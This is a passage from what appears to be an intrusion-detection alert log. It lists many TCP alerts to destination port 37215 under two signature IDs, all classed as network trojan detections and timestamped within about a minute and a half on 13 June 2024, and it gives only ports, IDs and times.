              SID:2829579
              Source Port:42794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992187
              SID:2835222
              Source Port:49628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128868
              SID:2835222
              Source Port:43250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164385
              SID:2829579
              Source Port:36376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803005
              SID:2829579
              Source Port:45976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437257
              SID:2835222
              Source Port:38470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527808
              SID:2829579
              Source Port:51262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370747
              SID:2829579
              Source Port:60604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027068
              SID:2835222
              Source Port:38962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424922
              SID:2829579
              Source Port:39118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156901
              SID:2829579
              Source Port:46378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174039
              SID:2829579
              Source Port:33698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992367
              SID:2829579
              Source Port:56292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262366
              SID:2835222
              Source Port:38160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274842
              SID:2829579
              Source Port:36944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042951
              SID:2829579
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457441
              SID:2829579
              Source Port:35772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223541
              SID:2835222
              Source Port:59768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257109
              SID:2829579
              Source Port:44442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040557
              SID:2835222
              Source Port:57712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309488
              SID:2835222
              Source Port:50598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556134
              SID:2829579
              Source Port:55794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670885
              SID:2829579
              Source Port:55372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751821
              SID:2829579
              Source Port:42042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317561
              SID:2829579
              Source Port:45718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229428
              SID:2829579
              Source Port:48662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056955
              SID:2835222
              Source Port:38474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090485
              SID:2829579
              Source Port:36828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697176
              SID:2829579
              Source Port:43256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297098
              SID:2835222
              Source Port:60216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013336
              SID:2829579
              Source Port:41908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889765
              SID:2835222
              Source Port:59074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376202
              SID:2835222
              Source Port:36892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695969
              SID:2829579
              Source Port:38624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307978
              SID:2829579
              Source Port:44792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090611
              SID:2835222
              Source Port:51938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086360
              SID:2835222
              Source Port:48856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092508
              SID:2835222
              Source Port:52306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821763
              SID:2829579
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025481
              SID:2835222
              Source Port:44438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408523
              SID:2835222
              Source Port:50674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458807
              SID:2835222
              Source Port:37984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112220
              SID:2835222
              Source Port:51044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175109
              SID:2829579
              Source Port:58356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838778
              SID:2829579
              Source Port:39686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168160
              SID:2829579
              Source Port:53988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568941
              SID:2835222
              Source Port:43566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658149
              SID:2829579
              Source Port:49812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728856
              SID:2835222
              Source Port:38938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504021
              SID:2835222
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929762
              SID:2835222
              Source Port:47652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305079
              SID:2835222
              Source Port:37264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136223
              SID:2829579
              Source Port:55014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551216
              SID:2835222
              Source Port:58888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193595
              SID:2835222
              Source Port:49436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091789
              SID:2829579
              Source Port:37696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454905
              SID:2829579
              Source Port:52022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243018
              SID:2835222
              Source Port:46906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629115
              SID:2829579
              Source Port:50316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436921
              SID:2835222
              Source Port:42948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694930
              SID:2835222
              Source Port:59038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707731
              SID:2835222
              Source Port:41318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567220
              SID:2829579
              Source Port:34298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914524
              SID:2829579
              Source Port:60228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131314
              SID:2829579
              Source Port:59402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611145
              SID:2829579
              Source Port:53842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458377
              SID:2835222
              Source Port:41898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300210
              SID:2835222
              Source Port:43510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355145
              SID:2835222
              Source Port:41932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.198861
              SID:2835222
              Source Port:49440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263933
              SID:2829579
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010933
              SID:2835222
              Source Port:47916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937058
              SID:2835222
              Source Port:47052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869864
              SID:2829579
              Source Port:58756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042558
              SID:2829579
              Source Port:53850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754202
              SID:2829579
              Source Port:36034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725452
              SID:2835222
              Source Port:60616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868875
              SID:2835222
              Source Port:37466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784937
              SID:2829579
              Source Port:41136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657672
              SID:2835222
              Source Port:53380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419838
              SID:2835222
              Source Port:38496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218296
              SID:2829579
              Source Port:47146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231157
              SID:2829579
              Source Port:56306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042390
              SID:2829579
              Source Port:49652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275819
              SID:2835222
              Source Port:55914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486335
              SID:2829579
              Source Port:47940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318448
              SID:2829579
              Source Port:49962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913494
              SID:2829579
              Source Port:36332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.319867
              SID:2835222
              Source Port:51142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268756
              SID:2829579
              Source Port:33234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107914
              SID:2829579
              Source Port:32942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174184
              SID:2835222
              Source Port:58328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912396
              SID:2835222
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242831
              SID:2829579
              Source Port:47236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609210
              SID:2829579
              Source Port:55058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821704
              SID:2835222
              Source Port:40252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241405
              SID:2835222
              Source Port:43354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421389
              SID:2829579
              Source Port:45520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677895
              SID:2829579
              Source Port:33638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477000
              SID:2829579
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635957
              SID:2829579
              Source Port:57672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127874
              SID:2829579
              Source Port:33366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546953
              SID:2829579
              Source Port:35174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408705
              SID:2829579
              Source Port:44362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421526
              SID:2835222
              Source Port:56398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485677
              SID:2835222
              Source Port:33774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306651
              SID:2829579
              Source Port:32994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417104
              SID:2829579
              Source Port:53148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509046
              SID:2829579
              Source Port:45386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300615
              SID:2835222
              Source Port:57168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131636
              SID:2829579
              Source Port:33934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524785
              SID:2829579
              Source Port:56756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228697
              SID:2829579
              Source Port:43924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303466
              SID:2835222
              Source Port:58524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177063
              SID:2829579
              Source Port:39740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156204
              SID:2835222
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308456
              SID:2835222
              Source Port:44490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909680
              SID:2835222
              Source Port:47548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214104
              SID:2829579
              Source Port:46858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527965
              SID:2835222
              Source Port:37758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728076
              SID:2829579
              Source Port:41234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371069
              SID:2829579
              Source Port:44640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545369
              SID:2835222
              Source Port:36474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109550
              SID:2835222
              Source Port:51776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409002
              SID:2829579
              Source Port:35826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077880
              SID:2835222
              Source Port:39824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153711
              SID:2829579
              Source Port:57568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193636
              SID:2835222
              Source Port:35988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375351
              SID:2835222
              Source Port:52778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193876
              SID:2835222
              Source Port:41834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320541
              SID:2835222
              Source Port:37394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614353
              SID:2829579
              Source Port:57316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044702
              SID:2835222
              Source Port:37956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545597
              SID:2835222
              Source Port:47046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.225072
              SID:2829579
              Source Port:37566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277676
              SID:2835222
              Source Port:41140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546039
              SID:2829579
              Source Port:58188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.305472
              SID:2829579
              Source Port:51200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403109
              SID:2829579
              Source Port:53100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976007
              SID:2829579
              Source Port:38718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506447
              SID:2829579
              Source Port:41936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784274
              SID:2835222
              Source Port:51480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660111
              SID:2835222
              Source Port:59958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610575
              SID:2835222
              Source Port:40118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755673
              SID:2829579
              Source Port:58098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669217
              SID:2829579
              Source Port:60134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248042
              SID:2829579
              Source Port:59070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137533
              SID:2829579
              Source Port:42116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316666
              SID:2835222
              Source Port:50582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730607
              SID:2835222
              Source Port:54108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759307
              SID:2835222
              Source Port:58764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941862
              SID:2835222
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303209
              SID:2829579
              Source Port:52166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246808
              SID:2835222
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488018
              SID:2829579
              Source Port:43694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.618109
              SID:2835222
              Source Port:36432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868686
              SID:2829579
              Source Port:48894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786736
              SID:2829579
              Source Port:36714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674487
              SID:2835222
              Source Port:48836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277418
              SID:2835222
              Source Port:49706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488456
              SID:2835222
              Source Port:58852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528314
              SID:2835222
              Source Port:51836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275546
              SID:2829579
              Source Port:47422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477478
              SID:2829579
              Source Port:60014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175867
              SID:2835222
              Source Port:42306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942517
              SID:2835222
              Source Port:38176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159660
              SID:2829579
              Source Port:45624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347840
              SID:2835222
              Source Port:50508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057850
              SID:2829579
              Source Port:54744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368781
              SID:2829579
              Source Port:58740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218011
              SID:2835222
              Source Port:58586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377989
              SID:2829579
              Source Port:55312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193731
              SID:2829579
              Source Port:34276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353473
              SID:2835222
              Source Port:55266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197165
              SID:2835222
              Source Port:34388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194458
              SID:2835222
              Source Port:48724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711597
              SID:2835222
              Source Port:36250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241021
              SID:2829579
              Source Port:57794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377404
              SID:2835222
              Source Port:41828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305300
              SID:2835222
              Source Port:54922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309463
              SID:2829579
              Source Port:52732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457470
              SID:2829579
              Source Port:56660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192235
              SID:2835222
              Source Port:50464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044732
              SID:2829579
              Source Port:60510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567605
              SID:2835222
              Source Port:45508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730983
              SID:2829579
              Source Port:37298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308103
              SID:2835222
              Source Port:33164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502991
              SID:2829579
              Source Port:57188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697536
              SID:2835222
              Source Port:60488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670020
              SID:2829579
              Source Port:48002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480745
              SID:2835222
              Source Port:41404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833894
              SID:2835222
              Source Port:56164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345802
              SID:2829579
              Source Port:36444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785058
              SID:2835222
              Source Port:35004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275208
              SID:2835222
              Source Port:39256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503530
              SID:2835222
              Source Port:53364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477929
              SID:2835222
              Source Port:42400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092859
              SID:2835222
              Source Port:52596
              Destination Port:37215
